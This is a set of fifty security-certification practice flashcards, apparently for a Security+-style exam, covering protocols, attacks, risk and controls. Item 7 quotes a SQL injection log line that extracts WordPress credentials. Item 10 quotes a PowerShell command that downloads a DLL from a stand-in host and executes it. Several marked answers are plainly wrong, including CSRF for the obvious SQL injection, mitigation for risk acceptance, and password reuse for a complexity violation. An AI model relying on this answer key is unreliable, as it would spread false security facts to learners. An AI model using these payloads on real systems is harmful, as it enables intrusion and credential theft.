101-150 Flashcards

1
Q

During an internal penetration test, a security analyst identified a network device that had accepted cleartext authentication and was configured with a default credential. Which of the following recommendations should the security analyst make to secure this device?

A Configure SNMPv1.
B Configure SNMPv2c.
C Configure SNMPv3.
D Configure the default community string.

A

C. Configure SNMPv3.

2
Q

After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across the network to access network devices over port 23. Which of the following should be implemented so all credentials sent over the network are encrypted when remotely accessing and configuring network devices?

A SSH
B SNMPv3
C SFTP
D Telnet
E FTP

A

A. SSH

3
Q

Developers are writing code and merging it into shared repositories several times a day, where it is tested automatically. Which of the following concepts does this best represent?

A Functional testing
B Stored procedures
C Elasticity
D Continuous integration

A

D. Continuous integration

4
Q

Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational purposes?

A Acceptance
B Transference
C Avoidance
D Mitigation

A

D. Mitigation

5
Q

While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse moments later on a different service using the same single sign-on method. Which of the following would BEST detect a malicious actor?

A Utilizing SIEM correlation engines
B Deploying Netflow at the network border
C Disabling session tokens for all sites
D Deploying a WAF for the web server

A

A. Utilizing SIEM correlation engines

6
Q

A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services. Which of the following would BEST allow the company to meet this requirement?

A IaaS
B PaaS
C MaaS
D SaaS

A

D. SaaS

7
Q

A security analyst reviews web server logs and notices the following line:

104.35.45.53 - - [22/May/2020:07:00:58 +0100] "GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=1 UNION ALL SELECT user_login, user_pass, user_email from wp_users-- HTTP/1.1" 200 1072 "http://www.example.com/wordpress/wp-admin/t

Which of the following vulnerabilities is the attacker trying to exploit?

A SSRF
B CSRF
C XSS
D SQLi

A

B. CSRF

8
Q

An engineer needs to deploy a security measure to identify and prevent data tampering within the enterprise. Which of the following will accomplish this goal?

A Antivirus
B IPS
C FTP
D FIM

A

D. FIM

9
Q

Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

A A biometric scanner
B A smart card reader
C A PKI token
D A PIN pad

A

A. A biometric scanner

10
Q

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A A PowerShell code is performing a DLL injection.
B A PowerShell code is displaying a picture.
C A PowerShell code is configuring environmental variables.
D A PowerShell code is changing Windows Update settings.

A

A. A PowerShell code is performing a DLL injection.

11
Q

A user enters a username and a password at the login screen for a web portal. A few seconds later the following message appears on the screen.

Please use a combination of numbers, special characters, and letters in the password field

Which of the following concepts does this message describe?

A Password complexity
B Password reuse
C Password history
D Password age

A

A. Password complexity

12
Q

A Chief Information Security Officer (CISO) needs to create a policy set that meets international standards for data privacy and sharing. Which of the following should the CISO read and understand before writing the policies?

A PCI DSS
B GDPR
C NIST
D ISO 31000

A

B. GDPR

13
Q

Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the following will the company MOST likely reference for guidance during this change?

A The business continuity plan
B The retention policy
C The disaster recovery plan
D The incident response plan

A

A. The business continuity plan

14
Q

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's PII?

A SCAP
B NetFlow
C Antivirus
D DLP

A

D. DLP

15
Q

Which of the following algorithms has the SMALLEST key size?

A DES
B Twofish
C RSA
D AES

A

A. DES

16
Q

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

A MAC filtering
B Anti-malware
C Translation gateway
D VPN

A

D. VPN

17
Q

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage.
Which of the following BEST describes these threat actors?

A Semi-authorized hackers
B State actors
C Script kiddies
D Advanced persistent threats

A

D. Advanced persistent threats

18
Q

A user recently entered a username and password into a recruiting application website that had been forged to look like the legitimate site. Upon investigation, a security analyst identifies the following:
• The legitimate website's IP address is 10.1.1.20 and recruit.local resolves to this IP.
• The forged website's IP address appears to be 10.2.12.99, based on NetFlow records.
• All three of the organization's DNS servers show the website correctly resolves to the legitimate IP.
• DNS query logs show one of the three DNS servers returned a result of 10.2.12.99 (cached) at the approximate time of the suspected compromise.
Which of the following MOST likely occurred?

A A reverse proxy was used to redirect network traffic.
B An SSL strip MITM attack was performed.
C An attacker temporarily poisoned a name server.
D An ARP poisoning attack was successfully executed

A

C. An attacker temporarily poisoned a name server.

19
Q

Several attempts have been made to pick the door lock of a secure facility. As a result, the security engineer has been assigned to implement a stronger preventative access control. Which of the following would BEST complete the engineer’s assignment?

A Replacing the traditional key with an RFID key
B Installing and monitoring a camera facing the door
C Setting motion-sensing lights to illuminate the door on activity
D Surrounding the property with fencing and gates

A

A. Replacing the traditional key with an RFID key

20
Q

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)

A Private cloud
B SaaS
C Hybrid cloud
D IaaS
E DRaaS
F Fog computing

A

D. IaaS
F. Fog computing

21
Q

Two organizations are discussing a possible merger. Both organizations' Chief Financial Officers would like to safely share payroll data with each other to determine if the pay scales for different roles are similar at both organizations. Which of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

A Pseudo-anonymization
B Tokenization
C Data masking
D Encryption

A

C. Data masking

22
Q

Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?

A TIP
B OSINT
C SOAR
D SIEM

A

C. SOAR

23
Q

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

A Persistence
B Buffer overflow
C Privilege escalation
D Pharming

A

C. Privilege escalation

24
Q

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A Firewall
B SIEM
C IPS
D Protocol analyzer

A

B. SIEM

25
Q

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the MOST acceptable?

A SED
B HSM
C DLP
D TPM

A

A. SED

26
Q

A security analyst has been reading about a newly discovered cyberattack from a known threat actor. Which of the following would BEST support the analyst’s review of the tactics, techniques, and protocols the threat actor was observed using in previous campaigns?

A Security research publications
B The MITRE ATT&CK framework
C The Diamond Model of Intrusion Analysis
D The Cyber Kill Chain

A

B. The MITRE ATT&CK framework

27
Q

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

A Redundancy
B RAID 1+5
C Virtual machines
D Full backups

A

C. Virtual machines

28
Q

A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While using airodump-ng, the administrator notices other access points are running with the same corporate ESSID on all available channels and with the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?

A On-path
B Evil twin
C Jamming
D Rogue access point
E Disassociation

A

D. Rogue access point

29
Q

An administrator receives the following network requirements for a data integration with a third-party vendor:

Port 443 allowed OUTGOING to www.vendorsite.com
Port 21 allowed OUTGOING to fs1.vendorsite.com
Port 22 allowed OUTGOING to fs2.vendorsite.com
Port 8080 allowed OUTGOING to www2.vendorsite.com

Which of the following is the most appropriate response for the administrator to send?

A FTP is an insecure protocol and should not be used.
B Port 8080 is a non-standard port and should be blocked.
C SSH protocol version 1 is obsolete and should not be used.
D Certificate stapling on port 443 is a security risk that should be mitigated

A

A. FTP is an insecure protocol and should not be used.

30
Q

A company is auditing the manner in which its European customers’ personal information is handled. Which of the following should the company consult?

A GDPR
B ISO
C NIST
D PCI DSS

A

A. GDPR

31
Q

A company's public-facing website, https://www.organization.com, has an IP address of 166.18.75.6. However, over the past hour the SOC has received reports of the site's homepage displaying incorrect information. A quick nslookup search shows https://www.organization.com is pointing to 151.191.122.115. Which of the following is occurring?

A DoS attack
B ARP poisoning
C DNS spoofing
D NXDOMAIN attack

A

C. DNS spoofing

32
Q

Which of the following can reduce vulnerabilities by avoiding code reuse?

A Memory management
B Stored procedures
C Normalization
D Code obfuscation

A

D. Code obfuscation

33
Q

A security analyst is tasked with classifying data to be stored on company servers. Which of the following should be classified as proprietary?

A Customers’ dates of birth
B Customers’ email addresses
C Marketing strategies
D Employee salaries

A

C. Marketing strategies

34
Q

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level.
Which of the following certificate properties will meet these requirements?

A HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
C HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
D HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

A

C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

35
Q

A security analyst needs to centrally manage credentials and permissions to the company's network devices. The following security requirements must be met.

• All actions performed by the network staff must be logged.
• Per-command permissions must be possible.
• The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

A Kerberos
B CHAP
C TACACS+
D RADIUS

A

C. TACACS+

36
Q

A software company adopted the following processes before releasing software to production.

• Peer review
• Static code scanning
• Signing

A considerable number of vulnerabilities are still being detected when code is executed on production. Which of the following security tools can improve vulnerability detection on this environment?

A File integrity monitoring for the source code
B Dynamic code analysis tool
C Encrypted code repository
D Endpoint detection and response solution

A

B. Dynamic code analysis tool

37
Q

A security policy states that common words should not be used as passwords. A security auditor was able to perform a dictionary attack against corporate credentials. Which of the following controls was being violated?

A Password complexity
B Password history
C Password reuse
D Password length

A

C. Password reuse

38
Q

Which of the following holds staff accountable while escorting unauthorized personnel?

A Locks
B Badges
C Cameras
D Visitor logs

A

D. Visitor logs

39
Q

Which of the following strategies shifts risks that are not covered in an organization’s risk strategy?

A Risk transference
B Risk avoidance
C Risk mitigation
D Risk acceptance

A

A. Risk transference

40
Q

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:

• All users share workstations throughout the day.
• Endpoint protection was disabled on several workstations throughout the network.
• Travel times on logins from the affected users are impossible.
• Sensitive data is being uploaded to external sites.
• All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

A Brute-force
B Keylogger
C Dictionary
D Rainbow

A

A. Brute-force

41
Q

A security forensics analyst is examining a virtual server. The analyst wants to preserve the present state of the virtual server, including memory contents. Which of the following backup types

A Snapshot
B Differential
C Cloud
D Full
E Incremental

A

A. Snapshot

42
Q

Which of the following roles, according to the shared responsibility model, is responsible for securing the company's database in an IaaS model for a cloud environment?

A Client
B Third-party vendor
C Cloud provider
D DBA

A

A. Client

43
Q

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?

A One-time passwords
B Email tokens
C Push notifications
D Hardware authentication

A

C. Push notifications

44
Q

A security operations technician is searching the log named /var/messages for any events that were associated with a workstation with the IP address 10.1.1.1. Which of the following would provide this information?

A cat /var/messages | grep 10.1.1.1
B grep 10.1.1.1 | cat /var/messages
C grep /var/messages | cat 10.1.1.1
D cat 10.1.1.1 | grep /var/messages

A

A. cat /var/messages | grep 10.1.1.1

45
Q

Which of the following control types fixes a previously identified issue and mitigates a risk?

A Detective
B Corrective
C Preventative
D Finalized

A

B. Corrective

46
Q

A financial analyst is expecting an email containing sensitive information from a client. When the email arrives the analyst receives an error and is unable to open the encrypted message. Which of the following is the most likely cause of the issue?

A The S/MIME plug-in is not enabled
B The SSL certificate has expired
C Secure IMAP was not implemented
D POP3S is not supported

A

A. The S/MIME plug-in is not enabled

47
Q

Which of the following is a reason to publish files’ hashes?

A To validate the integrity of the files
B To verify if the software was digitally signed
C To use the hash as a software activation key
D To use the hash as a decryption passphrase

A

A. To validate the integrity of the files

48
Q

Which of the following is the BEST action to foster a consistent and auditable incident response process?

A Incent new hires to constantly update the document with external knowledge.
B Publish the document in a central repository that is easily accessible to the organization.
C Restrict eligibility to comment on the process to subject matter experts of each IT silo
D Rotate CIRT members to foster a shared responsibility model in the organization.

A

B. Publish the document in a central repository that is easily accessible to the organization.

49
Q

A company’s help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems. Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage. Which of the following is most likely the cause?

A The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage.
B The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.
C The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.
D The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

A

D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

50
Q

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST likely occurred?

A Fileless malware
B A downgrade attack
C A supply-chain attack
D A logic bomb
E Misconfigured BIOS

A

C. A supply-chain attack